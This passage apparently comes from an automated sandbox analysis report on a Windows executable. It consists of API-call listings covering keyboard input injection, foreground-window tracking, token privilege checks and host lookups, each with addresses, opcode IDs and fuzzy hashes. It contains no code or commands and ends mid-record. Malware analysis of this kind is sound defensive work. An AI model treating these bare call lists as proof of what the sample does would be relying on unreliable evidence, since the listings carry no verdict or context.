                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002D8F03
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: bc5a6476766afa8e778a025a85a36105c12fd3a9c9d247f10e592663304c7650
                                                          • Instruction ID: faabb672c16090a4a5b9504edbaf835658a18156caf1ee764a98388408d6cf3d
                                                          • Opcode Fuzzy Hash: bc5a6476766afa8e778a025a85a36105c12fd3a9c9d247f10e592663304c7650
                                                          • Instruction Fuzzy Hash: 7231B334674109AEEB219F18CC89BAC37A6EB09310FA44503FA51D67E0CFB0DD608A51
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 002DB1D2
                                                          • GetWindowRect.USER32(?,?), ref: 002DB248
                                                          • PtInRect.USER32(?,?,002DC6BC), ref: 002DB258
                                                          • MessageBeep.USER32(00000000), ref: 002DB2C9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 75438fef9960698e6bd288c87015b8db8f45666d7606462d9fe53071f1c1cafa
                                                          • Instruction ID: fc8e1a673c1ec8dcc7b37c8572af5a82fe5dc00e03e75609d2a2d7a49386f749
                                                          • Opcode Fuzzy Hash: 75438fef9960698e6bd288c87015b8db8f45666d7606462d9fe53071f1c1cafa
                                                          • Instruction Fuzzy Hash: 71418B32A14105DFDF12CF98C8A9AAD7BF5FB49711F1A80AAE8189B350D330AC51CF90
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002B1326
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 002B1342
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002B13A8
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002B13FA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: cc38e578bbedd34f1995c603fc55f91fb16697c4c6c203c10eef2458da58a8f9
                                                          • Instruction ID: 03b3e812786dc351364c39fc1bc5b9ced7af2dc9b0adb39d874f2e3ecb7bd42c
                                                          • Opcode Fuzzy Hash: cc38e578bbedd34f1995c603fc55f91fb16697c4c6c203c10eef2458da58a8f9
                                                          • Instruction Fuzzy Hash: 6D319E30960209AEFF308E258C69BFEBBF5AB44390F84428AF491525D4E3B44DB19B51
                                                          APIs
                                                          • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 002B1465
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 002B1481
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 002B14E0
                                                          • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 002B1532
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: aca58bfe2f9822b0c9846965c69583b4e88b0e23b6a21ead6806d7c758e45da9
                                                          • Instruction ID: a2df3906db15594a0d0e7615a804a29b0ed7c7ce60aab20d9d932e7f03ad7b96
                                                          • Opcode Fuzzy Hash: aca58bfe2f9822b0c9846965c69583b4e88b0e23b6a21ead6806d7c758e45da9
                                                          • Instruction Fuzzy Hash: 24316C3096024A5EFF348F659C68BFBBBB5AB85350FD8431AE481521D1C3748DB29B61
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0028642B
                                                          • __isleadbyte_l.LIBCMT ref: 00286459
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00286487
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002864BD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: bc4a26fda95445e3c064c91285520e761329bbd854886a9698f9e9d428d9448e
                                                          • Instruction ID: 6785a7d32e8d5161f99359e8e704891ae2515f6f382acea4b065848ec0cace37
                                                          • Opcode Fuzzy Hash: bc4a26fda95445e3c064c91285520e761329bbd854886a9698f9e9d428d9448e
                                                          • Instruction Fuzzy Hash: F531D235622256AFDB31AF75CC48BAE7BA5FF40320F154029E8249B1E0DB31E860DB50
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 002D553F
                                                            • Part of subcall function 002B3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B3B4E
                                                            • Part of subcall function 002B3B34: GetCurrentThreadId.KERNEL32 ref: 002B3B55
                                                            • Part of subcall function 002B3B34: AttachThreadInput.USER32(00000000,?,002B55C0), ref: 002B3B5C
                                                          • GetCaretPos.USER32(?), ref: 002D5550
                                                          • ClientToScreen.USER32(00000000,?), ref: 002D558B
                                                          • GetForegroundWindow.USER32 ref: 002D5591
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 7d42f738e16a86bdde389a6c9c38c92df5a4b3a70044c639640f3eb12fcefbb2
                                                          • Instruction ID: 671e499ef1b8a9c0f59ffdf91f807373d66872b77da6a430956ae9f148325243
                                                          • Opcode Fuzzy Hash: 7d42f738e16a86bdde389a6c9c38c92df5a4b3a70044c639640f3eb12fcefbb2
                                                          • Instruction Fuzzy Hash: 6D314B71910108AFDB00EFA5D885DEFF7F9EF98304F10406AE815E7201EA71AE558FA4
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • GetCursorPos.USER32(?), ref: 002DCB7A
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0028BCEC,?,?,?,?,?), ref: 002DCB8F
                                                          • GetCursorPos.USER32(?), ref: 002DCBDC
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0028BCEC,?,?,?), ref: 002DCC16
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 7d0837a3137cacebc136d13593f0ed31068cd25369980611d7f4b3fd934ea9c1
                                                          • Instruction ID: cc407d9528a5bbd8538873fab903f4fdd1539ab4949213623ffc51c8759e5215
                                                          • Opcode Fuzzy Hash: 7d0837a3137cacebc136d13593f0ed31068cd25369980611d7f4b3fd934ea9c1
                                                          • Instruction Fuzzy Hash: 3031C134610059AFCB158F58C899EFE7BB9FB09310F24409AF9059B3A1C7319D61EFA0
                                                          APIs
                                                          • __setmode.LIBCMT ref: 00270BE2
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7E51,?,?,00000000), ref: 00264041
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7E51,?,?,00000000,?,?), ref: 00264065
                                                          • _fprintf.LIBCMT ref: 00270C19
                                                          • OutputDebugStringW.KERNEL32(?), ref: 002A694C
                                                            • Part of subcall function 00274CCA: _flsall.LIBCMT ref: 00274CE3
                                                          • __setmode.LIBCMT ref: 00270C4E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 6440f0c5575204d388577f87aa15b5522209074e10e87f726a55990d2d48a245
                                                          • Instruction ID: c2b4dcaf0e06364ff333a0d55589baa9aba385d91f420c10024bf9f0f603f23c
                                                          • Opcode Fuzzy Hash: 6440f0c5575204d388577f87aa15b5522209074e10e87f726a55990d2d48a245
                                                          • Instruction Fuzzy Hash: 91118731920105AAC709B7B4AC879BEBB6CDF01320F14810AF20857182DF311CB68BA1
                                                          APIs
                                                            • Part of subcall function 002A8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8D3F
                                                            • Part of subcall function 002A8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D49
                                                            • Part of subcall function 002A8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D58
                                                            • Part of subcall function 002A8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D5F
                                                            • Part of subcall function 002A8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D75
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002A92C1
                                                          • _memcmp.LIBCMT ref: 002A92E4
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A931A
                                                          • HeapFree.KERNEL32(00000000), ref: 002A9321
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 56f090f2fe7efe5f1cd05812f37a48aa5d7c2bb7b127d412c9e167a1aa846534
                                                          • Instruction ID: 326e2fc5266eaec33f21314084d159876787a3642f00e0dd43043acb74210996
                                                          • Opcode Fuzzy Hash: 56f090f2fe7efe5f1cd05812f37a48aa5d7c2bb7b127d412c9e167a1aa846534
                                                          • Instruction Fuzzy Hash: 6C219071E50109EFDF10DFA5C989BEEB7B8EF45301F144099E844AB290DB70AA99CF90
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 002D63BD
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002D63D7
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002D63E5
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002D63F3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: ec6fe5c4437540fb7d0e8b1ae18bab8c7f2c687d0d4c6d7bfd10a86b1d89306e
                                                          • Instruction ID: c34a4f6122704a44b209d2a424215405bd21119c9752c4e65d6f78ea03e99d03
                                                          • Opcode Fuzzy Hash: ec6fe5c4437540fb7d0e8b1ae18bab8c7f2c687d0d4c6d7bfd10a86b1d89306e
                                                          • Instruction Fuzzy Hash: 2E11E131361514AFDB00AB28DC88FBA77A8EF45720F144159F916CB2D1CBB0AD51CF94
                                                          APIs
                                                            • Part of subcall function 002AF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002AE46F,?,?,?,002AF262,00000000,000000EF,00000119,?,?), ref: 002AF867
                                                            • Part of subcall function 002AF858: lstrcpyW.KERNEL32(00000000,?,?,002AE46F,?,?,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AF88D
                                                            • Part of subcall function 002AF858: lstrcmpiW.KERNEL32(00000000,?,002AE46F,?,?,?,002AF262,00000000,000000EF,00000119,?,?), ref: 002AF8BE
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AE488
                                                          • lstrcpyW.KERNEL32(00000000,?,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AE4AE
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,002AF262,00000000,000000EF,00000119,?,?,00000000), ref: 002AE4E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 953feeb1500b825e8ad38d7fe8d25ab0d23fd252b5a8963dfa0c8a34b7547f62
                                                          • Instruction ID: 7491aaadc695dd687418ede0d6ee94b31529774efb6b19aae578bd9e1a1f6e1a
                                                          • Opcode Fuzzy Hash: 953feeb1500b825e8ad38d7fe8d25ab0d23fd252b5a8963dfa0c8a34b7547f62
                                                          • Instruction Fuzzy Hash: AA11D636110345AFDF259F24EC85D7A77B9FF46350B41402AF809CB290EF719961CBA1
                                                          APIs
                                                          • _free.LIBCMT ref: 00285331
                                                            • Part of subcall function 0027593C: __FF_MSGBANNER.LIBCMT ref: 00275953
                                                            • Part of subcall function 0027593C: __NMSG_WRITE.LIBCMT ref: 0027595A
                                                            • Part of subcall function 0027593C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,?,00000004,?,?,00271003,?), ref: 0027597F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 6df7c948cc197ed271a6a8a88e2284ed731a495849969bc7703d87ad2690179b
                                                          • Instruction ID: c1cdeb2fffb0605c6baaa68b7defb3c21b4a19433c6ec0584a17e9795ac5b3ff
                                                          • Opcode Fuzzy Hash: 6df7c948cc197ed271a6a8a88e2284ed731a495849969bc7703d87ad2690179b
                                                          • Instruction Fuzzy Hash: E8112732536E36EFCB313F70AC4969A37D89F543E0F108465F80C9A1D0CEB489609B80
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002B4385
                                                          • _memset.LIBCMT ref: 002B43A6
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002B43F8
                                                          • CloseHandle.KERNEL32(00000000), ref: 002B4401
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: 2a9a983f67dab174a20641b9aae7e87b796dbde87ca517f8ea891315f4e1d9eb
                                                          • Instruction ID: f1bc84ff5b6141e6d37650fd2db877ab4759804423e99793319453acfb2423ee
                                                          • Opcode Fuzzy Hash: 2a9a983f67dab174a20641b9aae7e87b796dbde87ca517f8ea891315f4e1d9eb
                                                          • Instruction Fuzzy Hash: 3511C8719512287AD7309BA5AC8DFEBBB7CEF44760F14459AF908EB180D2704E808AA4
                                                          APIs
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7E51,?,?,00000000), ref: 00264041
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7E51,?,?,00000000,?,?), ref: 00264065
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 002C6A84
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6A8F
                                                          • _memmove.LIBCMT ref: 002C6ABC
                                                          • inet_ntoa.WSOCK32(?), ref: 002C6AC7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: ecd4553e146fa148fbea11a5e2a989c35a220bce614e6d10db4d57df0192f691
                                                          • Instruction ID: be87bbbd49eeff221f72037fa46746e94ff9aaa2e483a35ae51db07e156608dd
                                                          • Opcode Fuzzy Hash: ecd4553e146fa148fbea11a5e2a989c35a220bce614e6d10db4d57df0192f691
                                                          • Instruction Fuzzy Hash: 7D119372520009AFCB04FFA4DD86DAEB7B8EF04305B144165F906A7262DF70AE64CFA1
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 002516B4
                                                          • GetClientRect.USER32(?,?), ref: 0028B93C
                                                          • GetCursorPos.USER32(?), ref: 0028B946
                                                          • ScreenToClient.USER32(?,?), ref: 0028B951
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: cd5dfb5c72769bef7ce1c99666c50e1d0ac9883001a3045acd3e47de9443d4a6
                                                          • Instruction ID: d667d3d445b617c7fab46140700dc816166ebed4a7b4acae30e62a500f4f6a2d
                                                          • Opcode Fuzzy Hash: cd5dfb5c72769bef7ce1c99666c50e1d0ac9883001a3045acd3e47de9443d4a6
                                                          • Instruction Fuzzy Hash: D2113435A20019ABCB04EF94D899ABE77B8EB04302F540856E901E7140C370AAA68FA9
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 002A9719
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A972B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A9741
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A975C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 2a7bf03ea3073c926a01ea37ecabf447afff6c5f0e555bf403f49342b473ad9a
                                                          • Instruction ID: 2af58787a95c664b854a4725727babe75a1f5e0315504cfb98e1223100f678e6
                                                          • Opcode Fuzzy Hash: 2a7bf03ea3073c926a01ea37ecabf447afff6c5f0e555bf403f49342b473ad9a
                                                          • Instruction Fuzzy Hash: B5114879910218FFEB11DF95CD84E9DFBB8FB49710F204091EA00B7290DA716E61DBA4
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                          • GetStockObject.GDI32(00000011), ref: 00252163
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 3874c0c31c3d4fc6fab458b457a4901bff19f81788ab89bacd6c534884a4c22e
                                                          • Instruction ID: 97857f43c11bda88a4b15d4f4366ab8f80851ee4c408cfb93e5a83d35812ba9d
                                                          • Opcode Fuzzy Hash: 3874c0c31c3d4fc6fab458b457a4901bff19f81788ab89bacd6c534884a4c22e
                                                          • Instruction Fuzzy Hash: 80118B72111A49BFDB024F909C84EEBBB69EF59365F084105FE0856091C771DCA69BA4
                                                          APIs
